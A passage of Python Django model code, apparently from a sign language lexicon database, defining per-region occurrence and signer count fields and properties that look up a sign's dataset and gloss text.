tokNoSgnr = models.IntegerField(_("Number of Signers"), null=True, blank=True)
tokNoA = models.IntegerField(_("Number of Occurrences in Amsterdam"), null=True, blank=True)
tokNoV = models.IntegerField(_("Number of Occurrences in Voorburg"), null=True, blank=True)
tokNoR = models.IntegerField(_("Number of Occurrences in Rotterdam"), null=True, blank=True)
tokNoGe = models.IntegerField(_("Number of Occurrences in Gestel"), null=True, blank=True)
tokNoGr = models.IntegerField(_("Number of Occurrences in Groningen"), null=True, blank=True)
tokNoO = models.IntegerField(_("Number of Occurrences in Other Regions"), null=True, blank=True)
tokNoSgnrA = models.IntegerField(_("Number of Amsterdam Signers"), null=True, blank=True)
tokNoSgnrV = models.IntegerField(_("Number of Voorburg Signers"), null=True, blank=True)
tokNoSgnrR = models.IntegerField(_("Number of Rotterdam Signers"), null=True, blank=True)
tokNoSgnrGe = models.IntegerField(_("Number of Gestel Signers"), null=True, blank=True)
tokNoSgnrGr = models.IntegerField(_("Number of Groningen Signers"), null=True, blank=True)
tokNoSgnrO = models.IntegerField(_("Number of Other Region Signers"), null=True, blank=True)
creationDate = models.DateField(_('Creation date'), default=datetime(2015, 1, 1))
lastUpdated = models.DateTimeField(_('Last updated'), auto_now=True)
creator = models.ManyToManyField(User)
alternative_id = models.CharField(max_length=50, null=True, blank=True)
@property
def dataset(self):
try:
return self.lemma.dataset
except:
return None
@property
def idgloss(self):
try:
return self.lemma.lemmaidglosstranslation_set.get(language=self.lemma.dataset.default_language).text
except:
pass
try:
return self.lemma.lemmaidglosstranslation_set.get(
language__language_code_2char=settings.DEFAULT_KEYWORDS_LANGUAGE['language_code_2char']).text
except:
pass
try:
return self.lemma.lemmaidglosstranslation_set.first().text
except:
return |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.